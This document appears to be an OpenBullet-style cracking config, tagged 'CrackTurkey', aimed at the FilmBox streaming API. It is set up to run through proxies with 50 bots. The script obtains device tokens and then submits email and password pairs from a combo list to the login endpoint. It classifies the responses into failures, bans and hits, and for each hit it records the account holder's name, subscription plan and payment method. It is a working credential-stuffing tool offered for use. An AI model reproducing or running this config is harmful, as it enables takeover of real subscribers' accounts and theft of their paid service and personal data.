[SETTINGS]
{
  "Name": "FilmBox iOS Api",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2022-06-22T01:50:43.9586751+03:00",
  "AdditionalInfo": "",
  "Author": "Raymond",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#CrackTurkey FUNCTION GetRandomUA 

#CrackTurkey REQUEST GET "https://api.filmbox.com/api/v2/auth/settings?d_type=web&logged_in=0&locale=tr-TR" 
  
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: tr-TR,tr;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: api.filmbox.com" 
  HEADER "Origin: https://app.filmbox.com" 
  HEADER "Referer: https://app.filmbox.com/" 
  HEADER "sec-ch-ua: \" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"97\", \"Chromium\";v=\"97\"" 
  HEADER "sec-ch-ua-mobile: ?1" 
  HEADER "sec-ch-ua-platform: \"Android\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "User-Agent: <UA>" 

#CrackTurkey KEYCHECK 
  KEYCHAIN Ban OR 
    KEY "Generated by cloudfront" 
  KEYCHAIN Success OR 
    KEY "d_id" 

#CrackTurkey PARSE "<SOURCE>" JSON "d_id" -> VAR "d_id" 

#CrackTurkey PARSE "<SOURCE>" JSON "g_id" -> VAR "g_id" 

#CrackTurkey REQUEST GET "https://api.filmbox.com/api/v2/auth/token?d_type=web&d_id=<d_id>&g_id=<g_id>&region=tr&locale=tr-TR" 
  
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: tr-TR,tr;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: api.filmbox.com" 
  HEADER "Origin: https://app.filmbox.com" 
  HEADER "Referer: https://app.filmbox.com/" 
  HEADER "sec-ch-ua: \" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"97\", \"Chromium\";v=\"97\"" 
  HEADER "sec-ch-ua-mobile: ?1" 
  HEADER "sec-ch-ua-platform: \"Android\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "User-Agent: <UA>" 

#CrackTurkey PARSE "<SOURCE>" JSON "access_token" -> VAR "access_token" 

#CrackTurkey REQUEST POST "https://api.filmbox.com/api/v2/auth/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"login_by\":\"manual\",\"d_type\":\"web\",\"region\":\"tr\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: api.filmbox.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: */*" 
  HEADER "Content-Type: application/json" 
  HEADER "Authorization: Bearer <access_token>" 
  HEADER "User-Agent: <UA>" 
  HEADER "Origin: https://app.filmbox.com" 
  HEADER "Referer: https://app.filmbox.com/" 
  HEADER "Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "Accept-Encoding: gzip, deflate" 

#CrackTurkey KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "message\":\"User Not Found" 
    KEY "message\":\"Girilen \\u015fifre yanl\\u0131\\u015f" 
    KEY "message\":\"Giri\\u015f ba\\u015far\\u0131s\\u0131z! L\\u00fctfen girdi\\u011finiz e-posta ve \\u015fifre kombinasyonunu kontrol edin" 
    KEY "message\":\"Undefined variable: error_messages" 
    KEY "status_code\":401" 
    KEY "status_code\":404" 
    KEY "The password field is required" 
    KEY "message\":\"This email is not registered." 
  KEYCHAIN Ban OR 
    KEY "Generated by cloudfront (CloudFront)" 
  KEYCHAIN Success OR 
    KEY "access_token\":\"" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "user_type\":0,\"" 

#CrackTurkey PARSE "<SOURCE>" JSON "user_name" CreateEmpty=FALSE -> CAP "İsim & Soyisim" 

#CrackTurkey PARSE "<SOURCE>" JSON "access_token" -> VAR "access_token" 

#CrackTurkey REQUEST GET "https://api.filmbox.com/api/v2/persona/users?region=tr&locale=tr-TR" 
  
  HEADER "Host: api.filmbox.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: */*" 
  HEADER "Content-Type: application/json" 
  HEADER "Authorization: Bearer <access_token>" 
  HEADER "User-Agent: <UA>" 
  HEADER "Origin: https://app.filmbox.com" 
  HEADER "Referer: https://app.filmbox.com/" 
  HEADER "Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "Accept-Encoding: gzip, deflate" 

#CrackTurkey PARSE "<SOURCE>" JSON "subscription_title" CreateEmpty=FALSE -> CAP "Paketi" 

#CrackTurkey PARSE "<SOURCE>" JSON "payment_processor" -> VAR "cap" 

#CrackTurkey FUNCTION Translate 
  KEY "Turksat" VALUE "Türksat ile abone olundu." 
  "<cap>" -> CAP "Ödeme Yöntemi" 

